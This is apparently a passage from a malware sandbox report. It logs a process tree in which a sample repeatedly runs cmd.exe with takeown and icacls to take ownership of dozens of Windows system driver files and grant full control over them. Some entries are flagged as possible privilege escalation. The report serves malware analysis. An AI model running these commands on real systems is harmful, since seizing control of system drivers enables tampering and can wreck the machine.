C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas.sys && icacls C:\Windows\System32\drivers\lsi_sas.sys /grant "%username%:F" && exit2⤵PID:5748
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_sas.sys3⤵PID:2748
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_sas.sys /grant "Admin:F"3⤵PID:5080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas2i.sys && icacls C:\Windows\System32\drivers\lsi_sas2i.sys /grant "%username%:F" && exit2⤵PID:6404
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_sas2i.sys3⤵PID:6056
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_sas2i.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:7072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas3i.sys && icacls C:\Windows\System32\drivers\lsi_sas3i.sys /grant "%username%:F" && exit2⤵PID:6316
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_sas3i.sys3⤵PID:6432
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_sas3i.sys /grant "Admin:F"3⤵PID:6520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\luafv.sys && icacls C:\Windows\System32\drivers\luafv.sys /grant "%username%:F" && exit2⤵PID:5912
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\luafv.sys3⤵PID:6664
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\luafv.sys /grant "Admin:F"3⤵PID:7028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mausbhost.sys && icacls C:\Windows\System32\drivers\mausbhost.sys /grant "%username%:F" && exit2⤵PID:6368
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mausbhost.sys3⤵
- Modifies file permissions
PID:6484
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mausbhost.sys /grant "Admin:F"3⤵PID:6400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mausbip.sys && icacls C:\Windows\System32\drivers\mausbip.sys /grant "%username%:F" && exit2⤵PID:5832
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mausbip.sys3⤵PID:6736
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mausbip.sys /grant "Admin:F"3⤵PID:6768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MbbCx.sys && icacls C:\Windows\System32\drivers\MbbCx.sys /grant "%username%:F" && exit2⤵PID:5756
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\MbbCx.sys3⤵PID:7004
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\MbbCx.sys /grant "Admin:F"3⤵PID:6512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mcd.sys && icacls C:\Windows\System32\drivers\mcd.sys /grant "%username%:F" && exit2⤵PID:5532
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mcd.sys3⤵
- Possible privilege escalation attempt
PID:5960
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mcd.sys /grant "Admin:F"3⤵PID:4288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MegaSas2i.sys && icacls C:\Windows\System32\drivers\MegaSas2i.sys /grant "%username%:F" && exit2⤵PID:6780
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\MegaSas2i.sys3⤵PID:5440
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\MegaSas2i.sys /grant "Admin:F"3⤵PID:7072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\megasas35i.sys && icacls C:\Windows\System32\drivers\megasas35i.sys /grant "%username%:F" && exit2⤵PID:6488
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\megasas35i.sys3⤵
- Possible privilege escalation attempt
PID:6840
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\megasas35i.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:5040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\megasr.sys && icacls C:\Windows\System32\drivers\megasr.sys /grant "%username%:F" && exit2⤵PID:5392
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\megasr.sys3⤵
- Modifies file permissions
PID:5960
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\megasr.sys /grant "Admin:F"3⤵PID:6884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Microsoft.Bluetooth.AvrcpTransport.sys && icacls C:\Windows\System32\drivers\Microsoft.Bluetooth.AvrcpTransport.sys /grant "%username%:F" && exit2⤵PID:7128
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Microsoft.Bluetooth.AvrcpTransport.sys3⤵PID:5752
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Microsoft.Bluetooth.AvrcpTransport.sys /grant "Admin:F"3⤵PID:2320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Microsoft.Bluetooth.Legacy.LEEnumerator.sys && icacls C:\Windows\System32\drivers\Microsoft.Bluetooth.Legacy.LEEnumerator.sys /grant "%username%:F" && exit2⤵PID:5592
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Microsoft.Bluetooth.Legacy.LEEnumerator.sys3⤵PID:6768
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Microsoft.Bluetooth.Legacy.LEEnumerator.sys /grant "Admin:F"3⤵PID:7064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mlx4_bus.sys && icacls C:\Windows\System32\drivers\mlx4_bus.sys /grant "%username%:F" && exit2⤵PID:6760
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mlx4_bus.sys3⤵PID:2320
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mlx4_bus.sys /grant "Admin:F"3⤵PID:6616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mmcss.sys && icacls C:\Windows\System32\drivers\mmcss.sys /grant "%username%:F" && exit2⤵PID:5156
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mmcss.sys3⤵
- Modifies file permissions
PID:884
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mmcss.sys /grant "Admin:F"3⤵PID:6976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\modem.sys && icacls C:\Windows\System32\drivers\modem.sys /grant "%username%:F" && exit2⤵PID:6208
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\modem.sys3⤵PID:7132
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\modem.sys /grant "Admin:F"3⤵PID:2500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\monitor.sys && icacls C:\Windows\System32\drivers\monitor.sys /grant "%username%:F" && exit2⤵PID:6540
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6168
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\monitor.sys3⤵PID:6684
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\monitor.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:7112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouclass.sys && icacls C:\Windows\System32\drivers\mouclass.sys /grant "%username%:F" && exit2⤵PID:6848
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mouclass.sys3⤵PID:6284
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mouclass.sys /grant "Admin:F"3⤵PID:6072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouhid.sys && icacls C:\Windows\System32\drivers\mouhid.sys /grant "%username%:F" && exit2⤵PID:5468
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5080
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mouhid.sys3⤵
- Possible privilege escalation attempt
PID:6560
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mouhid.sys /grant "Admin:F"3⤵PID:5440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mountmgr.sys && icacls C:\Windows\System32\drivers\mountmgr.sys /grant "%username%:F" && exit2⤵PID:6028
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mountmgr.sys3⤵PID:5640
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mountmgr.sys /grant "Admin:F"3⤵PID:6392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mpi3drvi.sys && icacls C:\Windows\System32\drivers\mpi3drvi.sys /grant "%username%:F" && exit2⤵PID:6104
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mpi3drvi.sys3⤵PID:6768
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mpi3drvi.sys /grant "Admin:F"3⤵PID:5652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mpsdrv.sys && icacls C:\Windows\System32\drivers\mpsdrv.sys /grant "%username%:F" && exit2⤵PID:6988
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mpsdrv.sys3⤵PID:6560
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mpsdrv.sys /grant "Admin:F"3⤵PID:6008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxdav.sys && icacls C:\Windows\System32\drivers\mrxdav.sys /grant "%username%:F" && exit2⤵PID:2928
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxdav.sys3⤵
- Modifies file permissions
PID:2320
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxdav.sys /grant "Admin:F"3⤵PID:6596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb.sys && icacls C:\Windows\System32\drivers\mrxsmb.sys /grant "%username%:F" && exit2⤵PID:6712
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxsmb.sys3⤵PID:6408
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxsmb.sys /grant "Admin:F"3⤵PID:6468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb20.sys && icacls C:\Windows\System32\drivers\mrxsmb20.sys /grant "%username%:F" && exit2⤵PID:6720
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxsmb20.sys3⤵
- Possible privilege escalation attempt
PID:4508
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxsmb20.sys /grant "Admin:F"3⤵PID:5144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msfs.sys && icacls C:\Windows\System32\drivers\msfs.sys /grant "%username%:F" && exit2⤵PID:5960
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msfs.sys3⤵PID:6668
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msfs.sys /grant "Admin:F"3⤵PID:6596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msgpioclx.sys && icacls C:\Windows\System32\drivers\msgpioclx.sys /grant "%username%:F" && exit2⤵PID:6448
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6552
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msgpioclx.sys3⤵PID:5848
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msgpioclx.sys /grant "Admin:F"3⤵PID:6220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msgpiowin32.sys && icacls C:\Windows\System32\drivers\msgpiowin32.sys /grant "%username%:F" && exit2⤵PID:7000
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6092
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msgpiowin32.sys3⤵
- Modifies file permissions
PID:6256
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msgpiowin32.sys /grant "Admin:F"3⤵PID:7152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mshidkmdf.sys && icacls C:\Windows\System32\drivers\mshidkmdf.sys /grant "%username%:F" && exit2⤵PID:6932
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mshidkmdf.sys3⤵PID:2420
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mshidkmdf.sys /grant "Admin:F"3⤵PID:6944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mshidumdf.sys && icacls C:\Windows\System32\drivers\mshidumdf.sys /grant "%username%:F" && exit2⤵PID:6308
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mshidumdf.sys3⤵
- Possible privilege escalation attempt
PID:5452
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mshidumdf.sys /grant "Admin:F"3⤵PID:6944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mshwnclx.sys && icacls C:\Windows\System32\drivers\mshwnclx.sys /grant "%username%:F" && exit2⤵PID:5572
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mshwnclx.sys3⤵PID:6216
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mshwnclx.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:6072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msisadrv.sys && icacls C:\Windows\System32\drivers\msisadrv.sys /grant "%username%:F" && exit2⤵PID:6444
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msisadrv.sys3⤵
- Possible privilege escalation attempt
PID:6996
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msisadrv.sys /grant "Admin:F"3⤵PID:7004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msiscsi.sys && icacls C:\Windows\System32\drivers\msiscsi.sys /grant "%username%:F" && exit2⤵PID:6560
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7064
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msiscsi.sys3⤵PID:6056
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msiscsi.sys /grant "Admin:F"3⤵PID:5672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mskssrv.sys && icacls C:\Windows\System32\drivers\mskssrv.sys /grant "%username%:F" && exit2⤵PID:6484
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mskssrv.sys3⤵PID:6276
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mskssrv.sys /grant "Admin:F"3⤵PID:6072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mslldp.sys && icacls C:\Windows\System32\drivers\mslldp.sys /grant "%username%:F" && exit2⤵PID:5524
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mslldp.sys3⤵PID:3740
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mslldp.sys /grant "Admin:F"3⤵PID:6556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspclock.sys && icacls C:\Windows\System32\drivers\mspclock.sys /grant "%username%:F" && exit2⤵PID:6536
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mspclock.sys3⤵PID:5716
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mspclock.sys /grant "Admin:F"3⤵PID:4288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspqm.sys && icacls C:\Windows\System32\drivers\mspqm.sys /grant "%username%:F" && exit2⤵PID:7008
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mspqm.sys3⤵PID:7164
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mspqm.sys /grant "Admin:F"3⤵PID:6312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msquic.sys && icacls C:\Windows\System32\drivers\msquic.sys /grant "%username%:F" && exit2⤵PID:5144
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5220
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msquic.sys3⤵PID:6632
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msquic.sys /grant "Admin:F"3⤵PID:6680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msrpc.sys && icacls C:\Windows\System32\drivers\msrpc.sys /grant "%username%:F" && exit2⤵PID:7044
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msrpc.sys3⤵PID:5132
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msrpc.sys /grant "Admin:F"3⤵PID:4288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mssmbios.sys && icacls C:\Windows\System32\drivers\mssmbios.sys /grant "%username%:F" && exit2⤵PID:6828
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mssmbios.sys3⤵PID:5980
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mssmbios.sys /grant "Admin:F"3⤵PID:6532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mstee.sys && icacls C:\Windows\System32\drivers\mstee.sys /grant "%username%:F" && exit2⤵PID:6664
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mstee.sys3⤵PID:3740
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mstee.sys /grant "Admin:F"3⤵PID:6532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MTConfig.sys && icacls C:\Windows\System32\drivers\MTConfig.sys /grant "%username%:F" && exit2⤵PID:6668
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\MTConfig.sys3⤵PID:7152
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\MTConfig.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:5764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mup.sys && icacls C:\Windows\System32\drivers\mup.sys /grant "%username%:F" && exit2⤵PID:6400
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7136
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mup.sys3⤵PID:6896
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mup.sys /grant "Admin:F"3⤵PID:6344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mvumis.sys && icacls C:\Windows\System32\drivers\mvumis.sys /grant "%username%:F" && exit2⤵PID:6728
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mvumis.sys3⤵PID:6568
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mvumis.sys /grant "Admin:F"3⤵PID:7096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndfltr.sys && icacls C:\Windows\System32\drivers\ndfltr.sys /grant "%username%:F" && exit2⤵PID:6964
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndfltr.sys3⤵PID:6960
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndfltr.sys /grant "Admin:F"3⤵PID:4388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndis.sys && icacls C:\Windows\System32\drivers\ndis.sys /grant "%username%:F" && exit2⤵PID:6220
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndis.sys3⤵PID:5452
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndis.sys /grant "Admin:F"3⤵PID:6124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiscap.sys && icacls C:\Windows\System32\drivers\ndiscap.sys /grant "%username%:F" && exit2⤵PID:6520
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndiscap.sys3⤵PID:6124
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndiscap.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:6568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\NdisImPlatform.sys && icacls C:\Windows\System32\drivers\NdisImPlatform.sys /grant "%username%:F" && exit2⤵PID:7004
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\NdisImPlatform.sys3⤵PID:6616
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\NdisImPlatform.sys /grant "Admin:F"3⤵PID:6992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndistapi.sys && icacls C:\Windows\System32\drivers\ndistapi.sys /grant "%username%:F" && exit2⤵PID:5920
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndistapi.sys3⤵PID:6512
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndistapi.sys /grant "Admin:F"3⤵PID:7520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndisuio.sys && icacls C:\Windows\System32\drivers\ndisuio.sys /grant "%username%:F" && exit2⤵PID:2604
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3060
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndisuio.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:896
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndisuio.sys /grant "Admin:F"3⤵PID:7364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\NdisVirtualBus.sys && icacls C:\Windows\System32\drivers\NdisVirtualBus.sys /grant "%username%:F" && exit2⤵PID:6068
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\NdisVirtualBus.sys3⤵PID:1532
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\NdisVirtualBus.sys /grant "Admin:F"3⤵PID:7528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiswan.sys && icacls C:\Windows\System32\drivers\ndiswan.sys /grant "%username%:F" && exit2⤵PID:6852
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndiswan.sys3⤵PID:5616
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndiswan.sys /grant "Admin:F"3⤵PID:7444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\NDKPerf.sys && icacls C:\Windows\System32\drivers\NDKPerf.sys /grant "%username%:F" && exit2⤵PID:6716
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6432
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\NDKPerf.sys3⤵PID:5776
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\NDKPerf.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:7588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\NDKPing.sys && icacls C:\Windows\System32\drivers\NDKPing.sys /grant "%username%:F" && exit2⤵PID:6820
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\NDKPing.sys3⤵PID:6992
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\NDKPing.sys /grant "Admin:F"3⤵PID:7356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndproxy.sys && icacls C:\Windows\System32\drivers\ndproxy.sys /grant "%username%:F" && exit2⤵PID:6516
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndproxy.sys3⤵
- Modifies file permissions
PID:6616
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndproxy.sys /grant "Admin:F"3⤵PID:7280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Ndu.sys && icacls C:\Windows\System32\drivers\Ndu.sys /grant "%username%:F" && exit2⤵PID:5888
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Ndu.sys3⤵PID:7428
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Ndu.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:7920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\NetAdapterCx.sys && icacls C:\Windows\System32\drivers\NetAdapterCx.sys /grant "%username%:F" && exit2⤵PID:6292
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\NetAdapterCx.sys3⤵PID:7256
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\NetAdapterCx.sys /grant "Admin:F"3⤵PID:7904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbios.sys && icacls C:\Windows\System32\drivers\netbios.sys /grant "%username%:F" && exit2⤵PID:6548
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\netbios.sys3⤵PID:7752
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\netbios.sys /grant "Admin:F"3⤵PID:6256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbt.sys && icacls C:\Windows\System32\drivers\netbt.sys /grant "%username%:F" && exit2⤵PID:5640
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\netbt.sys3⤵PID:7492
-
-
